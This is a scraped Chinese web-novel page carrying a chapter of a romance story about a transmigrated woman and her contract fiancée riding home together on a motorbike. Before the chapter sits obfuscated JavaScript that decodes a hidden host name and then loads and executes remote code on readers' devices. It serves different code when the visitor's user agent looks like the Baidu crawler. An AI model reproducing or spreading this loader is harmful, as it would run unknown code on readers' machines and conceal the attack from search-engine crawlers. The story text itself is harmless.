98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(11(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

她和偶像有缘也说不定。

然后她就看到了个年轻女人的背影,一头及腰乌发披在背心,白衬衣,蓝色修身的牛仔裤,一双小白鞋,纤纤巧巧,像极了她家那个便宜未婚妻宋若。

一开始她还不敢相信自己的眼睛,那小矮子怎么会出现在这种地方。

她在不远处站定了,不敢贸然上前搭讪,决定观望观望。

那言语无味面目可憎的男子,噼里啪啦一通尬撩,宋若出声回答:那本来就是我的。

孟璟确定,那确实是便宜未婚妻没有错。

宋若嗓音独特,像深山泉水流淌的泠泠声。

接着一系列操作,都是出于本能,反应过来时,便宜未婚妻已经揽在怀中,自己的嘴也贴到了人家额发上。柔滑的触感,还带着馨香。至于为什么她的本能是这样,而不是别的,孟璟觉得,这恐怕是哲学问题,一时半会儿想不清的。

对面那个什么威哥听见助理说她是小孟总,还追问了句:哪个小孟总?

助理两股战战:还有哪个小孟总,她是咱们孟总的内侄女儿啊,未来的,未来的

明威嚣张的气焰立马下去了,面色灰败,说了声不好意思,转身带着自己的团队鱼贯出去了。

这里孟璟立刻弹开,抓了抓头发,干咳了两声。

宋若没出声,蹲下身,将那摔出道裂缝的杯子捡起来,用个透明的小袋子装了,径直走了出去。

孟璟赶忙追上去,心想不是吧,这杯子都这样儿了,还要?这是惜物到什么程度?一念未完,只见她将那玩意儿当成垃圾扔进了路边的垃圾桶。孟璟舔舔唇珠,弯弯眼睛,原来是爱护环境哦。

宋若站在那里等着。孟璟三步两步追上去。

两人并排而行,隔着半米的距离,孟璟那车停在主干道,这个方向没错,但她提心吊胆,一路上,她都从旁边悄悄偷看宋若的神情,预备着她突然发飙。

但是都走到她的车旁边了,便宜未婚妻还是一言未发,孟璟就有点撑不住了,哎了一声。

宋若站住了,依旧是盯着自己的鞋尖。

孟璟感到从丹田升起一股无奈。如果说她本身是那种弱势的人也就算了,刚才和那男的battle的时候,她气势也不输啊。怎么到了自己跟前,这边还没说话呢,她就一副受了欺负,避之唯恐不及,最好快点说完拉倒的样子。这反而让人更想逗她玩儿好吗。不过孟璟深知自己几分钟前已经犯过一次事儿了,密集作死容易玩脱,也就没有再去戏弄便宜未婚妻,而是一本正经地叫她:宋小姐。

宋若微微抬了抬眸子,看得出来是在犹豫要不要看着她的脸,最后她还是再次看向了别处,一副云淡风轻的样子。

孟璟心塞爆了,闭眼道歉:刚不好意思,冒犯你了。不要介意。

如果介意我让你亲回来。

这种不端庄的话她及时刹车,没让它顺嘴溜出来。

否则这歉还不如不道。

宋若倒很有点讶异。

就在孟璟纠结怎么解释那个连本人也猝不及防的搂腰和亲吻时,宋若却一路都在踌躇怎么和孟璟说自己在这里的原因。

原本她的打算,先不要声张,时旌的眼光很高,她来试戏,也未必就能通过了,通过了也不必立即和阴郁女主说明,两个人说到底是各自为政,互不干涉,契约恋人并不是真的恋人,无需知无不言。等到电视剧播出,她自然也就知道她做了些什么。

哪里能料到,这头一天试戏,就给她碰见了。还这么巧,算是帮她解了围。她再不坦诚好像总有点愧疚。尤其是上午孟璟还发消息问过她去向。

谢谢你帮忙。她斟酌了下,开口道。

孟璟:啊?心里有点小窃喜,什么,亲了抱了,不但没被打,还能得到感谢?

便宜未婚妻这小药瓶,怕不是饿傻了。

她俯瞰过去,宋若白瓷般的脸上看不出任何戏谑或是反讽的成分,是非常严肃地在分析了:契约书上说好的,必要的时候,要表现得亲密一点。刚刚这种情况多谢。

在宋若看来,人心甘情愿喜欢的真爱小娇妻还没上线呢,阴郁女主也很为难,毕竟天良未泯,不能袖手旁观,任她遭人戏耍。刚刚那个亲密接触,她固然不喜欢,可孟璟也是勉为其难。

两个人站在这里说话,夏风送来一阵阵甜蜜花香,来往的大学生们一个个的,对这一对颜值高炸天的女生瞩目良久了。

孟璟听她略显清冷的嗓音连说两次感谢,表情不自然地咳嗽:不谢,小事一桩,互帮互助嘛。

宋若走了两步,停下,孟璟看她皱眉说:不过下次最好别那个,省得彼此不愉快。

孟璟顾左右,不好意思坦白她刚刚还可耻地感觉挺愉快的。

宋若接着说:我之所以在这里她一语未了,孟璟忽然凑上来,挽住她胳膊,压低了声音:我说,你真要在这里和我促膝长谈啊?先回家好不好?

远处那些假装散步、自拍,其实举起手机拍她俩的人,越来越多了。

上那机车之前,宋若还有点愣愣的,问:这车能坐么。

她作为一个掉威亚出意外死掉的穿越人士,还是比较惜命的。

怎么着?孟璟斜斜睨了她一眼,你怕?

宋若虽没有看她的脸,却也察觉到她言语神态间的调侃,默了一默,一语不发,接过头盔,爬上去坐好了,戴好头盔,着手系带子。她动作慢,怕抹香鲸急性子,猛然飚出去,轻轻说了声:等我一下。

孟璟在前边说:慢慢来,不急。

声音很温和。

这小说的世界设定,宋若依稀记得与自己生活的地方不一样,十六岁就可以拿机动车驾驶执照了。阴郁女主早早拿了驾照,带着真爱小娇妻各地飞驰,好不逍遥。

原主提过好几次,希望孟璟带她去兜兜风,顺便可以一起野餐之类的。其实就是邀孟璟去约会。只可惜孟璟基本都当作耳旁风,每次拒绝的理由还都不一样。比如几天前原主恰巧说过感冒,使唤孟璟去药店买药,那次孟璟就说:您身子骨那么弱,出去兜风要是着凉了可不得了,您还是跟家养着吧。再比如原主说上学要迟到了,孟璟那天干脆就逃课。

总而言之原主与阴郁女主的互动就是,原主想在孟璟跟前怒刷存在感,孟璟拒刷。

后来原主得知,孟璟常带小娇妻出去逛去,从此在黑化的道路上一去不复返。

宋若将两只手轻轻搭在抹香鲸的腰侧。

孟璟却径直将她的手拉到前边去,扣在一起,等于是让她抱住了自己,接着她又说了声:坐稳了,走了啊。

宋若:好。车子开动,迎面而来一股劲风,长发被头盔固定了上半截,露在外边的却被带得飞扬不已。

这时候,她心里有一个感想。假如她是那种爱好攻略的穿越者,既然占用了原主的身份,应当投桃报李,帮她完成她的心愿,拿下抹香鲸。

可她偏偏不是。她是这样一个明哲保身的人。她只想着自己的梦想,只想着过几天安稳日子。不肯冒任何不值当的风险。

没有人比她更懂得,爱不能强求,得之我幸,失之我命的道理。哪怕是血浓于水的父母之爱都如此,更何况原主和孟璟这种,靠一纸婚约维系的。

第16章 原来是她

两人一路吹了不少灰尘,回到家并没有急着相谈,先洗澡。

孟璟自觉在楼下的浴室,将楼上那间让给便宜未婚妻。

宋若的动作慢,她先洗完了,将简单的晚餐也弄好上桌,便宜未婚妻才慢吞吞地下楼来了。她的睡裙刚到膝盖下方,露着洁白纤细的小腿。孟璟懒洋洋地靠在椅背上看着,目光流连了会儿,有点不好意思地挪开,心里想,真的是个谨小慎微的家伙,连下个楼都这么一丝不苟。

宋若的头发还是半干的,她轻轻捋着,一边将今天出现在摄影棚的前因后果说了。

屋子里有凉爽的穿堂风过,她的嗓音轻柔之中见清冷,墙壁上挂钟滴答滴答,像在给她伴奏。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间